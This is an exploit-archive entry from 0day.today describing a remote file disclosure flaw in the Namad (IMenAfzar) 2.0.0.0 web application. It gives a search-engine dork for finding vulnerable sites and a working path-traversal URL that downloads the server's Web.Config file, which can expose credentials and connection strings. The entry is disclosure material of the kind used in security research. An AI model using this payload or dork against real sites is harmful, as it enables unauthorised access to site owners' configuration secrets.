id: 5206
date: 05/18/2009
title: Namad (IMenAfzar) 2.0.0.0 Remote File Disclosure Vulnerability
author: 0day Today Team
cves: 

==============================================================
Namad (IMenAfzar) 2.0.0.0 Remote File Disclosure Vulnerability
==============================================================


#################################################################
# Application Info:
# Name: Namad
# Version: 2.0.0.0
# Website: http://imenafzar.com
#################################################################
# Vulnerability Info:
# Type: Remote File Download Vulnerability
# Risk: Medium
# Dork: "Copyright 2008 ImenAfzar ver :2.0.0.0"
#===========================================================
# http://site.ir/SecureDownloads.aspx?Mode=Downloads&Type=Files&FileName=../../Web.Config
#===========================================================
#################################################################



#  0day.today [2023-03-21]  #